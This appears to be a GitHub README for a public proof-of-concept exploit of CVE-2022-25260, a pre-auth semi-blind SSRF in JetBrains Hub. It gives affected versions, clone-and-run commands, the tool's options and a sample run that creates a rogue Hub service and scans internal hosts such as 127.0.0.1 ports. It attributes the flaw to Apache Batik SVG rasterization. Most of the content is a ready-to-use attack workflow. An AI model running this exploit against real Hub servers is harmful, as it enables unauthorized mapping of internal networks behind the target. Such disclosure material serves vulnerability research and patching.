Skip to content

PoC for CVE-2022-25260: pre-auth semi-blind SSRF in JetBrains Hub

Notifications You must be signed in to change notification settings

yuriisanin/CVE-2022-25260

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2022-25260

JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)

Requirements

  • JetBrains Hub <2021.1.14276
  • JetBrains Hub before 2021.1.14276 was vulneable to improper access control (CVE-2022-34894), which allows an attacker create untrusted services without authentication even if guest user is disabled. This makes it possible to exploit the vulnerablity without any other requirements (normally an attacker should be at least authenticated)

Usage

Install & run:

$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

Usage:

$ python3 exploit.py hub_url http://localhost:8080 -email hello@0d.tf -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

DEMO:

CVE-2022-24342 Demo

How does it work?

The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization. You can find more information about exploting server-side SVG rasterization HERE.

Support

You can follow me on Twitter, GitHub or YouTube.

About

PoC for CVE-2022-25260: pre-auth semi-blind SSRF in JetBrains Hub

Topics

Resources

Stars

Watchers

Forks

Languages